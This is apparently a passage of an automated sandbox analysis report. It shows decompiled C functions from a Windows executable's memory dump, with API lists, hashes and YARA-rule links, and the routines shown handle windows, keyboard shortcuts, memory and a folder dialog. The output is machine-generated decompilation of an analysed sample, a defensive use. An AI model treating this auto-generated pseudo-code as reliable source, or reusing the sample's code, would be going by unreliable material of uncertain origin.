                                                                                                                0x004083f6
                                                                                                                0x004083f8
                                                                                                                0x00408401
                                                                                                                0x00408404
                                                                                                                0x00408407
                                                                                                                0x00408409
                                                                                                                0x0040840c
                                                                                                                0x00408413
                                                                                                                0x0040841d
                                                                                                                0x00408427
                                                                                                                0x0040842c
                                                                                                                0x0040842f
                                                                                                                0x00408432
                                                                                                                0x00408435
                                                                                                                0x00408438
                                                                                                                0x00408439
                                                                                                                0x0040843e
                                                                                                                0x0040843f
                                                                                                                0x00408442
                                                                                                                0x0040844a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                0x00406746
                                                                                                                0x00406746
                                                                                                                0x0040674f
                                                                                                                0x00406751
                                                                                                                0x00406752
                                                                                                                0x00406757
                                                                                                                0x00406758
                                                                                                                0x0040675d
                                                                                                                0x0040675f
                                                                                                                0x00406760
                                                                                                                0x00406765
                                                                                                                0x00406766
                                                                                                                0x0040676e
                                                                                                                0x00406770
                                                                                                                0x00406771
                                                                                                                0x00406776
                                                                                                                0x00406777
                                                                                                                0x0040677f
                                                                                                                0x00406781
                                                                                                                0x00406785
                                                                                                                0x00406787
                                                                                                                0x00406788
                                                                                                                0x0040678e
                                                                                                                0x0040678e
                                                                                                                0x00406790
                                                                                                                0x00406791
                                                                                                                0x00406796
                                                                                                                0x00406798
                                                                                                                0x0040679e
                                                                                                                0x004067a1
                                                                                                                0x004067a4
                                                                                                                0x004067ab

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                0x0040aba8
                                                                                                                0x0040aba9
                                                                                                                0x0040abb0
                                                                                                                0x0040abb2
                                                                                                                0x0040abb5
                                                                                                                0x0040ac19
                                                                                                                0x0040ac2c
                                                                                                                0x0040ac2e
                                                                                                                0x0040ac36
                                                                                                                0x0040ac39
                                                                                                                0x0040ac39
                                                                                                                0x0040ac1b
                                                                                                                0x0040ac21
                                                                                                                0x0040ac21
                                                                                                                0x0040abb7
                                                                                                                0x0040abcb
                                                                                                                0x0040abce
                                                                                                                0x0040abd7
                                                                                                                0x0040abe6
                                                                                                                0x0040abf6
                                                                                                                0x0040abfe
                                                                                                                0x0040ac09
                                                                                                                0x0040ac0f
                                                                                                                0x0040ac12
                                                                                                                0x0040ac4f

                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                0x00403a7d
                                                                                                                0x00403a8c
                                                                                                                0x00403a9c
                                                                                                                0x00403aba
                                                                                                                0x00403adf
                                                                                                                0x00403ae7
                                                                                                                0x00403af4
                                                                                                                0x00403af4
                                                                                                                0x00403ae7
                                                                                                                0x00403aba
                                                                                                                0x00403a9c
                                                                                                                0x00403b13

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                0x004034f0
                                                                                                                0x004034f8
                                                                                                                0x00403506
                                                                                                                0x00403516
                                                                                                                0x0040351c
                                                                                                                0x00403531
                                                                                                                0x00403537
                                                                                                                0x00403545
                                                                                                                0x0040354a
                                                                                                                0x00403556
                                                                                                                0x00403567
                                                                                                                0x00403575
                                                                                                                0x00403583
                                                                                                                0x00403583
                                                                                                                0x00403586
                                                                                                                0x00403592
                                                                                                                0x00403598
                                                                                                                0x004035ac

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                0x00407e2d
                                                                                                                0x00407e46
                                                                                                                0x00407e48
                                                                                                                0x00407e4d
                                                                                                                0x00407e5f
                                                                                                                0x00407e6b
                                                                                                                0x00407e6f
                                                                                                                0x00407e75
                                                                                                                0x00407e7c
                                                                                                                0x00407e7d
                                                                                                                0x00407e88
                                                                                                                0x00407e8d
                                                                                                                0x00407e8e
                                                                                                                0x00407eaa

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                0x00405e0a
                                                                                                                0x00405e12
                                                                                                                0x00405e18
                                                                                                                0x00405e1c
                                                                                                                0x00405e1e
                                                                                                                0x00405e1e
                                                                                                                0x00405e24
                                                                                                                0x00405e2c
                                                                                                                0x00405e2e
                                                                                                                0x00405e44
                                                                                                                0x00405e49
                                                                                                                0x00405e4c
                                                                                                                0x00405e4d
                                                                                                                0x00405e68
                                                                                                                0x00405e74
                                                                                                                0x00405e74
                                                                                                                0x00000000
                                                                                                                0x00405e84
                                                                                                                0x00405e8c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                0x00409a4a
                                                                                                                0x00409a4f
                                                                                                                0x00409a56
                                                                                                                0x00409a5e
                                                                                                                0x00409a60
                                                                                                                0x00409a6e
                                                                                                                0x00409a6e
                                                                                                                0x00409a60
                                                                                                                0x00409a71
                                                                                                                0x00409a76
                                                                                                                0x00000000
                                                                                                                0x00409a78
                                                                                                                0x00000000
                                                                                                                0x00409a89

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                0x0040588e
                                                                                                                0x0040588f
                                                                                                                0x0040588f
                                                                                                                0x00405892
                                                                                                                0x00405896
                                                                                                                0x004058a9
                                                                                                                0x004058a9
                                                                                                                0x004058ad
                                                                                                                0x004058af
                                                                                                                0x004058b5
                                                                                                                0x004058b6
                                                                                                                0x004058b9
                                                                                                                0x004058c2
                                                                                                                0x004058c3
                                                                                                                0x004058c8
                                                                                                                0x004058d2
                                                                                                                0x004058d4
                                                                                                                0x004058d9
                                                                                                                0x004058e0
                                                                                                                0x004058ea
                                                                                                                0x004058ec
                                                                                                                0x004058ed
                                                                                                                0x004058f2
                                                                                                                0x004058f9
                                                                                                                0x00405902
                                                                                                                0x00405898
                                                                                                                0x00405898
                                                                                                                0x0040589a
                                                                                                                0x0040589c
                                                                                                                0x004058a1
                                                                                                                0x004058a2
                                                                                                                0x004058a5
                                                                                                                0x004058a7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00405912
                                                                                                                0x00405915
                                                                                                                0x0040591e
                                                                                                                0x0040591e
                                                                                                                0x00405907
                                                                                                                0x0040590b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                0x0040ad06
                                                                                                                0x0040ad0a
                                                                                                                0x0040ad0c
                                                                                                                0x0040ad14
                                                                                                                0x0040ad19
                                                                                                                0x0040ad1f
                                                                                                                0x0040ad23
                                                                                                                0x0040ad27
                                                                                                                0x0040ad2a
